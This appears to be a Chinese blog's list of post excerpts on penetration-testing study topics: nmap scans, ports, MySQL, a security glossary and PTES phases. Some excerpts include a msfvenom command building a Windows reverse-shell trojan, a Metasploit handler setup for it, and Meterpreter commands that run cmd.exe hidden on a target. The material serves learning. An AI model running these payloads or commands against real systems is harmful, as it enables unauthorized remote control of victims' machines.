wutiangui

摘要： 1.修改/etc/network/interfaces，重启网卡2.改为桥接模式，勾选复制物理网络连接状态3.右下角小电脑勾选连接4.dhclient eth0 vi /etc/network/interfaces添加 auto eth0iface eth0 inet dhcp重启网络/etc/in 阅读全文

摘要： background挂起会话sessions连接会话sessions -i 1sysinfo查看系统信息在目标机上隐藏执行cmd.exe程序meterpreter > execute -H -f cmd.exeProcess 2584 created.meterpreter > execute -f 阅读全文

摘要： 启动 msfconsole msfconsole下依次执行如下命令[use exploit/multi/handler][set payload windows/meterpreter/reverse_tcp] //192.168.25.128是攻击机IP[set LHOST 192.168.25. 阅读全文

摘要： 我们使用metasploit中的另一个后门工具msfvenom生成一个木马，方便我们测试meterpretermsfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.25.128 LPORT=1234 -f exe -o /root/she 阅读全文

摘要： Nmap 简单扫描nmap 192.168.218.2带详细描述nmap -vv 192.168.218.2 nmap 路由跟踪nmap --traceroute 192.168.218.2nmap 操作系统类型的探测map -O 192.168.218.2带详细描述的系统探测nmap -vv -O 阅读全文

摘要： 查看数据库表结构 DESC 数据表名称 查看表结构语法格式 DESCRIBE 表名称（可查看主键） 创建数据库表 USE mysql;CREATE TABLE tb_emp1 (id INT(11),name VARCHAR(25),deptId INT(11),salary FLOAT ) 添加数 阅读全文

摘要： http 80 ftp 21 ssh 22 smtp 25 DNS 53 pop3 110 rpc(远程) 135 MySQL数据库 3306 MSSQL数据库 1433 Oracle数据库 1521 SysBase数据库 4200 DB2数据库 5000 postgreSQL 5432 非关系型数 阅读全文

摘要： 漏洞 软硬件缺陷，通过它可以破坏系统 木马 能获取用户权限进而控制电脑的程序 后门 黑客为下次攻击留下的入口 病毒 会破坏系统并能通过网络自动传播 shell 命令执行程序如cmd webshell 网站控制台 poc 验证漏洞的完整程序或代码 exp 漏洞利用的一段或一行代码 肉鸡 黑客可通过你攻 阅读全文

摘要： 1 交互 2. 信息收集 3. 威胁建模 漏洞分析 4. 渗透攻击 5. 后渗透攻击 6. 撰写报告 类比：五一游玩 1、游玩准备 2、路线地点收集 3、可玩性筛选 4、实际体验 5、有别人介绍的游玩体验 6、游玩总结 PTES 标准中的渗透测试阶段是用来定义渗透测试过程，并确保客户组织能够以一种标 阅读全文